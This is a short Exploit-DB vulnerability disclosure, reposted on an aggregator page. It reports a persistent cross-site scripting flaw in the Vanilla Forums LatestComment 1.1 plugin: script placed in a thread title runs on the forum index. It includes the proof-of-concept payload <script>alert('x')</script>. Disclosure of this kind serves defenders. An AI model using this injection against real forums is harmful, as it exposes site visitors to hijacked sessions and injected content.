Vanilla Forums LatestComment 1.1 Plugin – Persistent Cross-Site Scripting

Exploit Database
12 阅读

作者： Henry Hoggard

日期： 2012-05-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18908/

# Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1

#http://vanillaforums.org/addon/latestcomment-plugin

# http://vanillaforums.org
#############################################################

Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.

XSS:
<script>alert('x')</script>

#############################################################

http://henryhoggard.co.uk

last Exploits
Vanilla Forums LatestComment 1.1 Plugin – Persistent Cross-Site Scripting的更多信息

NodeBB Forum 1.12.2-1.14.2 – Account Takeover：
Joplin 1.2.6 – ‘link’ Cross Site Scripting：
Nagios Log Server 2.1.6 – Persistent Cross-Site Scripting：
Oracle NoSQL 11g 1.1.100 R2 – ‘log’ Directory Traversal：
Hotel Booking Portal 0.1 – Multiple Vulnerabilities：
SPA-Cart eCommerce CMS 1.9.0.3 – Reflected XSS：
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting：
Booked Scheduler 2.7.5 – Remote Command Execution (RCE) (Authenticated)：